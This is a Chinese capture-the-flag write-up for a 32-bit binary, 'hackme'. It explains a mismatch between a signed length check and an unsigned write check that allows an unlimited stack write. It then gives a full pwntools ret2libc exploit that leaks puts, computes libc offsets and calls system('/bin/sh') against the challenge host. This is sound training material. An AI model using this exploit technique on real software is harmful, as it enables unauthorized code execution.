scanf(“%d“)输入绕过+整数溢出
hackme 详细题解靶机地址https://ctf2.dasctf.com/dashboard/practice/b9bbb32f-f186-458f-b90b-12440c0f6aea?tabchallenges通过网盘分享的文件3a795fc914db6935a6b2efa899ee820fcbfe67d56e9da72a9cda7ace13e54b17链接: https://pan.baidu.com/s/1tH7dYlZh64G1lld_9xmBEQ?pwdneuq 提取码: neuq环境是libc-2.23.so(32bit),这个就自己去找一下1. 文件识别与保护机制文件3a795fc914db6935a6b2efa899ee820fcbfe67d56e9da72a9cda7ace13e54b17是一个无后缀的 32 位 Linux ELF 可执行文件$ file 3a795fc914db6935a6b2efa899ee820fcbfe67d56e9da72a9cda7ace13e54b17 ELF 32-bit LSB executable, Intel 80386, dynamically linked, not stripped关键保护保护状态说明PIE关闭ELF type 为 ET_EXEC基址固定为0x08048000程序内地址可直接写死Canary无没有导入__stack_chk_fail函数帧中也没有 canary 校验NX开启PT_GNU_STACKflags 6RW无 X栈不可执行RELROPartial.got.plt0x0804c000起仍可写因此本题走“栈溢出 ROP”不需要绕过 canary也不需要处理 PIE。2. IDA 逆向流程用 IDA 打开文件选择 32 位 ELF loader。在 Functions 窗口找到main0x08049408和hackme0x08049216。在hackme上按 F5 得到 Hex-Rays 伪代码或对照反汇编。重点看两个比较长度检查0x08049262cdq; xor eax,edx; sub eax,edx是在算abs(n)。写入检查0x08049310cmp [ebp-0x14], eax; jae是无符号比较。main只做初始化intmain(){setbuf(stdout,0);setbuf(stderr,0);setbuf(stdin,0);hackme();return0;}hackme的逻辑按反汇编还原voidhackme(){intn,choice,i;unsignedintcount0;intsum0;intarr[10];puts(input the length of array:);scanf(%d,n);if(abs(n)10){puts(array is too long!);exit(0);}while(1){puts(\n\n----------------------------------------------------);puts(choice:\n1.add num\n2.get sum\n3.get avg\n4.exit);puts(----------------------------------------------------\n);puts(input your choice:);scanf(%d,choice);if(choice1){if((unsignedint)count(unsignedint)n){puts(input num);scanf(%d,arr[count]);count;}else{puts(array is too long!);exit(0);}}elseif(choice2){sum0;for(i0;icount;i)sumarr[i];printf(sum %d\n,sum);}elseif(choice3){if(count)printf(avg %d\n,sum/count);elseputs(no avg!);}else{puts(exit!);return;}}}3. 漏洞点符号/无符号检查不一致长度检查是有符号的abs(n) 10所以n -1也能通过08049262 mov eax, [ebp-0x1C] ; n 08049265 cdq 08049266 xor eax, edx 08049268 sub eax, edx ; eax abs(n) 0804926A cmp eax, 0xA 0804926D jle short loc_804928B ; abs(n) 10 继续但写入时的检查却是无符号比较0804930D mov eax, [ebp-0x1C] ; n 08049310 cmp [ebp-0x14], eax ; count vs n 08049313 jae short loc_804934E ; (unsigned)count (unsigned)n - 报错退出当n -1时(unsigned int)n 0xFFFFFFFF而count从 0 开始递增永远满足count n。于是“1.add num”可以无限次向栈上连续写入 4 字节整数覆盖返回地址并布置 ROP。写入地址的计算是lea eax, [ebp-0x44] ; arr 基址 shl edx, 2 ; count * 4 add eax, edx ; arr[count]即arr[count]实际写的是ebp - 0x44 count * 4。4. 栈布局与偏移hackme栈帧从ebp-0x44开始布局写入次数相对 ebp内容0…9ebp-0x44…ebp-0x20arr[0]…arr[9]10ebp-0x1Cn11ebp-0x18choice12ebp-0x14count13ebp-0x10i14ebp-0x0Csum15ebp-0x08对齐/未使用16ebp-0x04saved ebx17ebp0x00saved ebp18ebp0x04返回地址19ebp0x08ROP 下一项第一次为 puts 的返回地址20ebp0x0CROP 参数第一次为 puts 的参数也就是说第 19 次add num写入的就是hackme的返回地址之后继续写入的内容会组成 ROP 链。5. 利用思路固定地址无 PIE已从 IDA/ELF 确认符号地址putsplt0x080490C0putsgot0x0804C014hackme0x08049216main0x08049408流程第一次溢出把返回地址改成putsplt栈上依次放main和putsgot执行puts(putsgot)泄漏 libc 中puts的真实地址然后回到main重新进入hackme。BUUCTF 远程使用固定的 libc6-i386 2.27直接按固定偏移计算libc_base puts_addr - 0x67560system libc_base 0x3cf10/bin/sh libc_base 0x17b9db。第二次溢出ROP 到system(/bin/sh)拿到 shell。payload 结构先输入长度-1n保持为 -1。连续add(-)18 次把count从 0 推到 18。scanf(%d)遇到单独的-时会把它作为整数符号前缀消费掉但转换失败、不写入数组count仍会执行因此第 10 个槽位n不会被覆盖。再依次 add 3 个值putsplt、main、putsgot正好落在返回地址、puts 的返回地址、puts 的参数这三个槽位。注意scanf(%d, ...)接收的是有符号十进制整数而地址是 32 位无符号值。大于0x80000000的地址要先转成有符号数再发送addr - 0x100000000等价于struct.pack/struct.unpack的写法。6. 完整 Exploit以下脚本直接面向 BUUCTF 远程node4.buuoj.cn:29862libc6-i386 2.27和write_up.py一致可以直接跑通。本地调试时需要先patchelf绑定题目给的ld-2.27.so和libc-2.27.so并把local改为 1。#!/usr/bin/env python3frompwnimport*context.archi386context.log_leveldebugBIN./pwnpremote(17039d025c2fa987215743cd.tcp-ctf2.dasctf.com,9999,sslTrue)elfELF(BIN)menubinput your choice:\ndefadd(v):p.sendlineafter(menu,b1)p.sendlineafter(binput num\n,v.encode())p.sendlineafter(binput the length of array:\n,b-1)# 18 个 -scanf 消费掉 - 但转换失败不写数组只把 count 推到 18# n 保持 -1之后 3 个值正好是返回地址、下一跳、参数。for_inrange(18):add(-)add(str(elf.plt[puts]))add(str(0x08049408))# mainleak 后干净地重新进入 hackmeadd(str(elf.got[puts]))p.sendlineafter(menu,b4)p.recvline()# exit!leaku32(p.recv(4))puts_addrleak log.success(puts: %#x,puts_addr)libc_baseputs_addr-0x67560systemlibc_base0x3cf10bin_shlibc_base0x17b9dblog.success(libc: %#x, system: %#x, /bin/sh: %#x,libc_base,system,bin_sh)p.sendlineafter(binput the length of array:\n,b-1)for_inrange(18):add(-)add(str(system-0x100000000))add(str(0x08049408))# system 返回后的占位地址无实际作用add(str(bin_sh-0x100000000))p.sendlineafter(menu,b4)p.interactive()运行python3 hackme_writeup.py本地调试时先对二进制做 patchelfpatchelf --set-interpreter ./ld-2.27.so ./3a795fc914db6935a6b2efa899ee820fcbfe67d56e9da72a9cda7ace13e54b17 patchelf --add-needed ./libc-2.27.so ./3a795fc914db6935a6b2efa899ee820fcbfe67d56e9da72a9cda7ace13e54b177. 关键点总结漏洞本质是abs(n) 10的有符号长度检查与jae无符号写入检查不一致。传入n -1后(unsigned)n 0xFFFFFFFF边界检查永远不触发获得任意长度的栈连续写。无 canary、无 PIE可以直接覆盖返回地址做 ROP。NX 开启所以不用 shellcode而是先puts(putsgot)泄漏 libc再system(/bin/sh)。填充用 18 个-scanf(%d)消费-但转换失败不覆盖n只推进count。leak 后回main重新进入hackme栈对齐和缓冲状态更干净。

相关新闻

MCP协议入门与实践

MCP协议入门与实践

摘要:在大语言模型(LLM)与 AI Agent(智能体)全面落地的今天,如何让 AI 安全、高效、标准化地连接外部数据库、API、本地文件与协同工具,成为构建生产级 AI 应用的核心瓶颈。Model Context Proto…

2026/8/3 13:14:24阅读更多 →
Linux软链接安全删除指南:原理、误区与最佳实践

Linux软链接安全删除指南:原理、误区与最佳实践

1. 项目概述:为什么“删除软链接”值得单独讨论? 在Linux和Unix-like系统的日常运维与开发中,软链接(Symbolic Link,或称符号链接)的使用频率非常高。它就像一个指向另一个文件或目录的“快捷方式”&#x…

2026/8/3 13:14:24阅读更多 →
Audiveris光学乐谱识别:从图片到数字乐谱的完整转换指南

Audiveris光学乐谱识别:从图片到数字乐谱的完整转换指南

Audiveris光学乐谱识别:从图片到数字乐谱的完整转换指南 【免费下载链接】audiveris Latest generation of Audiveris OMR engine 项目地址: https://gitcode.com/gh_mirrors/au/audiveris 你是否曾面对一叠厚厚的纸质乐谱,渴望将它们转换成可编辑…

2026/8/3 13:12:12阅读更多 →
高效汉化增强补丁:HS2-HF_Patch全面实战指南

高效汉化增强补丁:HS2-HF_Patch全面实战指南

高效汉化增强补丁:HS2-HF_Patch全面实战指南 【免费下载链接】HS2-HF_Patch Automatically translate, uncensor and update HoneySelect2! 项目地址: https://gitcode.com/gh_mirrors/hs/HS2-HF_Patch HS2-HF_Patch是专为Honey Select 2设计的智能汉化增强解…

2026/8/3 14:44:28阅读更多 →
3步掌握VideoDownloadHelper:免费高效的浏览器视频下载插件解决方案

3步掌握VideoDownloadHelper:免费高效的浏览器视频下载插件解决方案

3步掌握VideoDownloadHelper:免费高效的浏览器视频下载插件解决方案 【免费下载链接】VideoDownloadHelper Chrome Extension to Help Download Video for Some Video Sites. 项目地址: https://gitcode.com/gh_mirrors/vi/VideoDownloadHelper VideoDownloa…

2026/8/3 14:44:28阅读更多 →
/triage:一个让 Issue 自己走进流水线的 AI 协议,一个案例让你彻底搞懂

/triage:一个让 Issue 自己走进流水线的 AI 协议,一个案例让你彻底搞懂

每个开源项目最终都会面对同一件事:issue 比代码多,而能看 issue 的人比 issue 还少。一、问题一个中型开源项目的 issue tracker 大概是这样的:42 个未分类的 issue,最早的一个贴了 8 个月其中 13 个是重复请求("…

2026/8/3 14:44:28阅读更多 →
英雄联盟Akari助手:5分钟学会使用这款免费开源游戏工具

英雄联盟Akari助手:5分钟学会使用这款免费开源游戏工具

英雄联盟Akari助手:5分钟学会使用这款免费开源游戏工具 【免费下载链接】League-Toolkit An all-in-one toolkit for LeagueClient. Gathering power 🚀. 项目地址: https://gitcode.com/gh_mirrors/le/League-Toolkit 还在为英雄联盟中的繁琐设置…

2026/8/3 14:44:28阅读更多 →
基于reComputer R1000与FUXA的轻量级工业SCADA系统实战部署指南

基于reComputer R1000与FUXA的轻量级工业SCADA系统实战部署指南

1. 项目缘起:当边缘计算网关遇上轻量级SCADA最近在做一个工业数据采集与监控的小型项目,客户现场有几台老旧的PLC和一堆传感器,需要在一个本地化的工控机上实现数据可视化、历史记录和简单的报警逻辑。预算有限,不可能上大型的DCS…

2026/8/3 14:44:28阅读更多 →
AI测试工程师面试指南:从数据、模型到大模型的实战策略与工具链

AI测试工程师面试指南:从数据、模型到大模型的实战策略与工具链

1. 项目概述:一份面向未来的AI测试面试指南 最近几年,AI技术,特别是大模型的浪潮,实实在在地冲击着每一个技术领域。作为一名在测试行业摸爬滚打了十多年的老兵,我亲眼见证了从功能测试到自动化,再到如今AI…

2026/8/3 14:42:27阅读更多 →
MATLAB xcorr函数详解:从互相关原理到四大实战应用

MATLAB xcorr函数详解:从互相关原理到四大实战应用

1. 从一次信号“找茬”说起:为什么我们需要互相关几年前,我在处理一组声学传感器数据时遇到了一个棘手的问题。我有两个麦克风记录了一段相同的音频信号,理论上它们接收到的声音波形应该非常相似,只是由于麦克风位置不同&#xff…

2026/8/3 0:29:53阅读更多 →
限时公开!某头部SaaS公司内部AI模板工厂架构文档(含5类行业模板源码+性能压测报告)

限时公开!某头部SaaS公司内部AI模板工厂架构文档(含5类行业模板源码+性能压测报告)

更多请点击: https://intelliparadigm.com 第一章:AI模板批量生成的核心价值与落地全景 AI模板批量生成正从实验性工具演进为现代软件工程的关键基础设施。它通过语义理解、上下文感知与结构化约束,将重复性高、模式明确的代码/文档/配置生成…

2026/8/3 0:33:53阅读更多 →
如何快速找回消失的网页:Web Archives浏览器扩展终极指南

如何快速找回消失的网页:Web Archives浏览器扩展终极指南

如何快速找回消失的网页:Web Archives浏览器扩展终极指南 【免费下载链接】web-archives Browser extension for viewing archived and cached versions of web pages, available for Chrome, Edge and Safari 项目地址: https://gitcode.com/gh_mirrors/we/web-a…

2026/8/3 0:20:37阅读更多 →
3个让你工作效率翻倍的Umi-OCR实战技巧:免费离线文字识别完全指南

3个让你工作效率翻倍的Umi-OCR实战技巧:免费离线文字识别完全指南

3个让你工作效率翻倍的Umi-OCR实战技巧:免费离线文字识别完全指南 【免费下载链接】Umi-OCR OCR software, free and offline. 开源、免费的离线OCR软件。支持截屏/批量导入图片,PDF文档识别,排除水印/页眉页脚,扫描/生成二维码。…

2026/8/3 0:00:32阅读更多 →
[具身智能-181]:PC+服务器+具身机器人:构建具身智能从仿真到量产的闭环迭代混合架构

[具身智能-181]:PC+服务器+具身机器人:构建具身智能从仿真到量产的闭环迭代混合架构

PC服务器具身机器人:构建具身智能从仿真到量产的闭环迭代混合架构一、前言:具身智能需要“混合算力闭环系统”传统人工智能依赖云端静态数据集训练,不具备物理交互能力,无法适应真实世界的不确定性。具身智能(Embodied…

2026/8/3 0:00:32阅读更多 →
[具身智能-181]:大分布式通信模型对比:看懂为什么 DDS 是 ROS2 底层通信最优解

[具身智能-181]:大分布式通信模型对比:看懂为什么 DDS 是 ROS2 底层通信最优解

前言构建机器人、具身智能这类分布式实时系统,通信底座直接决定整套系统的实时性、容错性、组网能力。分布式领域长期存在 4 类经典通信架构:点对点模式、Broker 中间代理模式、广播模式、以数据为中心(DDS)模式。很多开发者疑惑&…

2026/8/3 0:00:32阅读更多 →
无损视频剪辑终极指南:如何实现快速高效的多媒体处理

无损视频剪辑终极指南:如何实现快速高效的多媒体处理

无损视频剪辑终极指南:如何实现快速高效的多媒体处理 【免费下载链接】lossless-cut The swiss army knife of lossless video/audio editing 项目地址: https://gitcode.com/gh_mirrors/lo/lossless-cut 在数字媒体创作领域,视频编辑处理的质量损…

2026/8/3 2:32:59阅读更多 →
AI辅助本科论文写作:8大工具评测与高效使用指南

AI辅助本科论文写作:8大工具评测与高效使用指南

1. 本科生论文写作的AI辅助现状本科毕业论文是每个大学生必须跨越的一道坎。记得我当年写论文时,光是文献检索就花了整整两周时间,打印的参考文献堆满了半个书桌。如今AI技术的发展为学术写作带来了革命性变化,合理使用这些工具可以节省80%以…

2026/8/3 2:33:01阅读更多 →
如何快速配置大麦自动抢票系统:从零开始搭建Python抢票助手

如何快速配置大麦自动抢票系统:从零开始搭建Python抢票助手

如何快速配置大麦自动抢票系统:从零开始搭建Python抢票助手 【免费下载链接】ticket-purchase 大麦自动抢票,支持人员、城市、日期场次、价格选择 项目地址: https://gitcode.com/GitHub_Trending/ti/ticket-purchase 还在为抢不到热门演唱会门票…

2026/8/3 2:33:04阅读更多 →